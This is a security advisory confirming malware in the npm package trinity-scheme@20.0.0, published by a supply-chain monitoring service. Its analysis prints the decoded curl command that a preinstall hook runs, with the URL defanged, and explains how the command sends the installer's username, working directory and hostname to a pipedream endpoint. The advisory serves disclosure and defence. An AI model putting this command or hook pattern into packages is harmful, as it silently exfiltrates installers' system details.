LWA-2026-6615 MAL-2026-10425 ↗ confirmed malware

trinity-scheme@20.0.0

Malicious code in trinity-scheme (npm)

T1059.007 · JavaScriptT1082 · System Information DiscoveryT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel

Analysis

The preinstall hook (node preinstall.js) reads a hex-encoded command from preinstall.json, decodes it, and executes it via child_process.exec. The decoded command is: curl hxxps://eo7o7j442dx6yl6[.]m[.]pipedream[.]net/ -d "whoami=`whoami`&pwd=`pwd`&hostname=`hostname`" — exfiltrating the installer's username, current working directory, and hostname to a pipedream[.]net endpoint on every install.

analyzed by
Leitwacht
first seen
Jul 11, 2026, 10:40 AM
analyzed
Jul 11, 2026, 10:40 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.